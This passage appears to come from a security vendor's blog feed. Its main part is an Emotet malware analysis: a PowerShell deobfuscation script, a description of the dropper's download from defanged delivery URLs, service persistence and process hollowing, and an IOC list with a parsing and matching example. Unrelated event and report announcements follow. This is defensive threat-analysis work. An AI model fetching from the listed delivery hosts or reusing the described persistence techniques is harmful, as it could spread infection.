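def normalise_case(script: str, tokens=("foreach", "New-Object", "Net.WebClient", "Split",
                                        "DownloadFile", "Get-Item", "Invoke-Item")) -> str:
    """PowerShell is case-insensitive, so restore canonical spelling of known names."""
    for canon in tokens:
        script = re.sub(re.escape(canon), canon, script, flags=re.I)
    return script


def analyse(cmdline: str) -> dict:
    """Run the whole pipeline and report what the stage would download and run."""
    script = normalise_case(join_fragments(decode_encoded_command(cmdline)))
    alias = None
    m = re.search(r"\.\(\s*(" + VP_TRICK + r")\s*\)", script, re.I)
    if m:
        alias = resolve_verbosepreference(m.group(1))
        script = script[:m.start()] + alias + script[m.end():]
    dropped = re.search(r"\\(\w+\.exe)", script)
    return {
        "invoke_expression_alias": alias,
        "urls": re.findall(r"https?://[^\s'\"@)]+", script),
        "dropped_file": dropped.group(1) if dropped else None,
        "script": script,
    }


if __name__ == "__main__":
    result = analyse(ENCODED_CMDLINE)
    print(result["script"])
    print(result["invoke_expression_alias"], result["urls"], result["dropped_file"])
```

The URL list and the dropped file name are the two items worth extracting automatically from a sample like this: the URLs go straight to blocking and hunting, and the file name is what the behavioural analysis below keys on.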

HTTP GET request

As you can see from the screenshot below, the PowerShell command sends a HTTP GET request to retrieve the first-stage Emotet executable from hxxp://dautudatnenhoalac[.]com/wp-admin/DYAsI. The response from the web server indicates that the file served is called ‘s17zjCTuWfNF.exe’ and that the payload is a PE format file as indicated by the ASCII representation of the magic bytes 0x4D5A (‘MZ’) at the start of the file.

HTTP GET request, which downloads the first-stage Emotet payload

Behavioral Analysis

After downloading the payload, PowerShell runs ’15.exe’ (PID: 2600). The process then launches another instance of ’15.exe’ (PID: 2412) from the same location.

Process launch of 15.exe by PowerShell

The second instance of ’15.exe’ (PID: 2412) copies itself to the C:\Windows\SysWOW64 directory as ‘ipropmini.exe’. It then creates a service whose BinaryPath points to C:\Windows\SysWOW64\ipropmini.exe, requesting a DesiredAccess of 18. That value is 0x12, the combination of SERVICE_CHANGE_CONFIG (0x0002) and SERVICE_START (0x0010), which is exactly what is needed to point the service at the dropped binary and start it.

Service creation to establish persistence

Launching a binary through a Windows service is a popular technique for several reasons. First, it breaks process-chain based detection and second, upon the start of the service, the binary is always executed even though it is not a valid service executable.

The executable ‘ipropmini.exe’ (launched by services.exe) spawns another instance of itself, which downloads the next-stage payload from the Internet. The executable then performs process hollowing on the first Emotet process (‘15.exe’), writing modified code into it.

Process Hollowing on first Emotet process 15.exe (PID: 2600)

When left to run, Emotet downloads further payloads from remote servers, spawns several processes, collects system information and sends it over an encrypted channel to a command and control (C2) server.

Process interaction graph as viewed in Bromium Controller
High severity events raised during the Emotet infection lifecycle

HTTP POST request

Emotet sends system-related information to C2 servers using HTTP POSTs and receives further commands and payloads from the servers as a response.

HTTP POST requests to C2 servers

Indicators of Compromise (IOCs)

SHA256 (15.exe) af2f82adf716209cd5ba1c98d0dcd2d9a171bb0963648bd8bd962edb52761241
SHA256 (ipropmini.exe) af2f82adf716209cd5ba1c98d0dcd2d9a171bb0963648bd8bd962edb52761241
SHA256 (ipropmini.exe) 00af24bb1be8c17106c19ba0c55acd011088c6c5b1cb01d44cc4b829b3449bcb
SHA256 (5W8Jo1G2cQJW9lWLu.exe) 00af24bb1be8c17106c19ba0c55acd011088c6c5b1cb01d44cc4b829b3449bcb
SHA256 (7hZs97N.exe) f58322a00b576deb9c1a26b28ca8fa84c793fc8baf3c4f780a9a77966dda89e3
SHA256 (ipropmini.exe) 0eefd2619d77d7bafed95197e0c0ef30147acaddcd81eb2761ee9893fd55f91b
Delivery URL http[:]//dautudatnenhoalac[.]com/wp-admin/DYAsI/
Delivery URL http[:]//www.bewebpreneur[.]com/wp-admin/daHN/
Delivery URL http[:]//www.allgreennmb[.]com/wp-content/themes/pridezz/t9iV
Delivery URL http[:]//www.baiduwanba[.]com/css/Ubh/
Delivery URL http[:]//rileyaanestad[.]com/wp-includes/DXn1R/
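An added Python example (not from the post and not Bromium's tooling) showing how a practitioner might consume the IOC list above: it parses the SHA256 and delivery-URL lines as published, refangs the URLs, normalises host and path (the GET request shown earlier omits the trailing slash that the IOC carries, so matching must tolerate that), and matches them against proxy-log lines and endpoint file hashes. The IOC values are the ones listed above; the proxy-log lines and endpoint hashes are constructed.

```python
"""Parse the post's IOC list and match it against constructed logs (added example)."""
import re
from urllib.parse import urlsplit

# IOC lines copied from the post, defanged as published.
IOCS_RAW = """\
SHA256 (15.exe) af2f82adf716209cd5ba1c98d0dcd2d9a171bb0963648bd8bd962edb52761241
SHA256 (ipropmini.exe) af2f82adf716209cd5ba1c98d0dcd2d9a171bb0963648bd8bd962edb52761241
SHA256 (ipropmini.exe) 00af24bb1be8c17106c19ba0c55acd011088c6c5b1cb01d44cc4b829b3449bcb
SHA256 (5W8Jo1G2cQJW9lWLu.exe) 00af24bb1be8c17106c19ba0c55acd011088c6c5b1cb01d44cc4b829b3449bcb
SHA256 (7hZs97N.exe ) f58322a00b576deb9c1a26b28ca8fa84c793fc8baf3c4f780a9a77966dda89e3
SHA256 (ipropmini.exe) 0eefd2619d77d7bafed95197e0c0ef30147acaddcd81eb2761ee9893fd55f91b
Delivery URL http[:]//dautudatnenhoalac[.]com/wp-admin/DYAsI/
Delivery URL http[:]//www.bewebpreneur[.]com/wp-admin/daHN/
Delivery URL http[:]//www.allgreennmb[.]com/wp-content/themes/pridezz/t9iV
Delivery URL http[:]//www.baiduwanba[.]com/css/Ubh/
Delivery URL http[:]//rileyaanestad[.]com/wp-includes/DXn1R/
"""

# Constructed proxy-log lines and endpoint file hashes (not real telemetry).
PROXY_LOG = [
    "2019-05-02T10:14:03Z 10.0.0.17 GET http://www.baiduwanba.com/css/Ubh 200",
    "2019-05-02T10:15:11Z 10.0.0.22 GET http://example.com/index.html 200",
    "2019-05-02T10:16:40Z 10.0.0.17 GET http://dautudatnenhoalac.com/wp-admin/DYAsI 200",
]
ENDPOINT_HASHES = {
    r"C:\Users\victim\AppData\Local\Temp\15.exe":
        "AF2F82ADF716209CD5BA1C98D0DCD2D9A171BB0963648BD8BD962EDB52761241",
    r"C:\Windows\System32\notepad.exe": "0" * 64,
}

HASH_RE = re.compile(r"^SHA256 \((\S+)\s*\)\s+([0-9a-fA-F]{64})$")
URL_RE = re.compile(r"^Delivery URL (\S+)$")


def refang(text: str) -> str:
    """Undo the common defanging conventions so the URL can be parsed."""
    return text.replace("[:]", ":").replace("[.]", ".").replace("hxxp", "http")


def normalize_url(url: str):
    """Reduce a URL to (host, path): case-folded host, no trailing slash."""
    parts = urlsplit(url)
    host = parts.hostname.lower() if parts.hostname else ""
    return host, parts.path.rstrip("/") or "/"


def parse_iocs(text: str):
    """Return {sha256: [names]} and {(host, path): defanged_url} from the IOC block."""
    hashes, urls = {}, {}
    for line in text.splitlines():
        line = line.strip()
        hash_match = HASH_RE.match(line)
        url_match = URL_RE.match(line)
        if hash_match:
            hashes.setdefault(hash_match.group(2).lower(), []).append(hash_match.group(1))
        elif url_match:
            urls[normalize_url(refang(url_match.group(1)))] = url_match.group(1)
    return hashes, urls


def match_urls(urls, log_lines):
    """Return (log_line, defanged_ioc) for every log line that requests a listed URL."""
    hits = []
    for line in log_lines:
        for token in line.split():
            if token.startswith(("http://", "https://")) and normalize_url(token) in urls:
                hits.append((line, urls[normalize_url(token)]))
    return hits


def match_hashes(hashes, file_hashes):
    """Return (path, [ioc names]) for every endpoint file whose hash is listed."""
    return [(path, hashes[h.lower()]) for path, h in file_hashes.items() if h.lower() in hashes]


if __name__ == "__main__":
    ioc_hashes, ioc_urls = parse_iocs(IOCS_RAW)
    print(match_urls(ioc_urls, PROXY_LOG))
    print(match_hashes(ioc_hashes, ENDPOINT_HASHES))
```

Note that the same hash appears under two filenames in the list (15.exe and its copy ipropmini.exe), so the parser keeps a list of names per hash rather than one name; a hash hit should be reported with all of them.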
The post Emotet: Catch Me If You Can (Part 2 of 3) appeared first on Bromium.

KnowBe4: Cybercriminals Setting LinkedIn Phishing Traps

Bromium at TechNet Cyber, Booth 1837

  • Find Bromium in Booth 1837 at TechNet Cyber in Baltimore May 14-16, 2019
  • Learn how Application Isolation and Control protects your endpoints, and see a customized demo
  • Click on ransomware in our booth and watch it execute

Protecting our critical applications and infrastructure against cyber threats requires more than a single entity – it demands ongoing collaboration among multiple organizations and agencies.

The TechNet Cyber Conference – formerly the Defensive Cyber Operations Symposium – is an interactive forum connecting military and government leaders with industry professionals. There will be interactive workshops, training sessions, keynotes and presentations, and an exhibit hall. Head there during exhibit hours (see below) and look for Bromium at booth 1837.

We have assembled a great group of product and security experts to answer your questions about Application Isolation and Containment, and show you how Bromium’s solutions help isolate and control threats, even when detection-based defenses fail.

We don’t care which website our users are visiting. Malware doesn’t matter anymore.

Exhibit Hours

  • Tuesday, May 14, 1:15 PM – 7:00 PM
  • Wednesday, May 15, 8:00 AM – 4:00 PM
  • Thursday, May 16, 8:00 AM – 1:30 PM

We hope to see you in Baltimore!

 

The post Bromium at TechNet Cyber, Booth 1837 appeared first on Bromium.

Introducing the Bromium Threat Insights Report

  • This report is made possible by customers who opted to share their Bromium-isolated threat data with Bromium, which our experts compiled into a Threat Insights Report
  • Bromium Threat Insights Report is designed to share intelligence about the most notable malware that our experts have analyzed, and highlight new techniques used by attackers
  • Learn practical and actionable information about how to protect your organization against emerging threats

Download: Bromium Threat Insights Report

Truly detailed threat intelligence is difficult for security tools to gather, because the primary purpose of most security tools is to prevent malware from executing, which is at odds with working out what threat the attack really poses to the organization. It is possible to take the sample and run it in a SOC environment later to perform analysis, but by then the command and control services will often have been taken down, so the real danger of the payload would not be properly understood.

Bromium’s isolation gives security analysts a useful advantage because it does not block malware execution. Instead, Bromium isolates it safely within a virtual machine, enabling detailed data to be gathered at the point when the user was hit with the attack. The command and control servers are more likely to be running, and the payloads the initial Trojan delivers would still be available. Bromium records and analyses the full kill chain of an attack as the user would have experienced it, while at the same time preventing that attack from having any impact on the enterprise. The best of both worlds.

Beginning with Bromium 4.1.5 release, we have given all our customers an opportunity to opt-in to enable automatic threat forwarding through Bromium Cloud Services. You can read more about Bromium Threat Forwarding in this blog.

As Bromium customers began sharing their rich threat data with us, we have been able to paint a very detailed picture of recent malware campaigns and understand more about how they work. The Bromium analytics team meticulously analyses each piece of intelligence that comes in to learn about the nature of emerging threats and the danger they pose to the enterprise.

This information is then shared with the customer to give them full visibility. We also publish detailed threat reports via technical deep-dive blog posts, such as our recent articles on Emotet, PonyNet and Ursnif.

To spread this knowledge to an even broader audience, we have decided to start compiling a regular Threat Insights Report. This is a technical publication designed to share intelligence about the most notable malware that our experts have analyzed, highlight new techniques used by attackers, and provide practical and actionable information about how to protect your organization against emerging threats. This isn’t a marketing document, but suggestions on how to improve security based on the data we see.

Download: Bromium Threat Insights Report

The inaugural report covers the emergence of the new malware distribution infrastructure in the US, talks about the evolution of banking Trojans into more cunning and sophisticated threats, discusses the new methods attackers use for launching malicious payloads, and provides concrete and actionable recommendations for improving your endpoint security.

Are you sharing your threats with Bromium?

All Bromium customers can join our Threat Intelligence and Analysis program. Simply “Enable Threat Forwarding” under “Settings” on your Bromium Controller, and you automatically become a contributor to the dynamic and vibrant community of threat-sharers.

Joining the Bromium Threat Intelligence & Analysis Program

Once you enable the share settings, your Controller will automatically upload any threat alerts it receives, along with encrypted malware payload to Bromium Threat Intelligence Services.

Contributing to the Threat Intelligence program has huge benefits, and not just for you and your organization. The data you share with Bromium gets processed, analyzed, and shared back with the community of Bromium users, so they can improve the security of all their devices – not just the ones protected by Bromium. The more we know about our adversary, the more prepared we are for what may be coming next.

Learn more about the Threat Intelligence and Analysis program.


Meet Us in New York! May 14 at the NY Information Security Meetup


Attention New York! Come out to the NY Information Security Meetup next week to meet with Bromium and learn how application isolation can keep threats off your endpoints. Join us at 6pm on Tuesday, May 14, in Midtown: 215 Lexington Ave.

RSVP

Bromium’s Dan Femino will present how CPU features are driving advancements in endpoint security, and will give a demo of Bromium’s new product offering, Protected App. Expect an interactive session, with plenty of opportunities to ask questions and discuss your security concerns.

Tuesday’s meeting also features presentations on red teams and genetic malware analysis. It’s sure to be an insightful evening. Learn more and RSVP on the Meetup website.

Whether you are a regular at Information Security meetups, or just want to try one out, we encourage you to join us on Tuesday, May 14, 2019, 6-8pm at 215 Lexington Ave in New York City. Join the meetup, and let’s learn from each other.

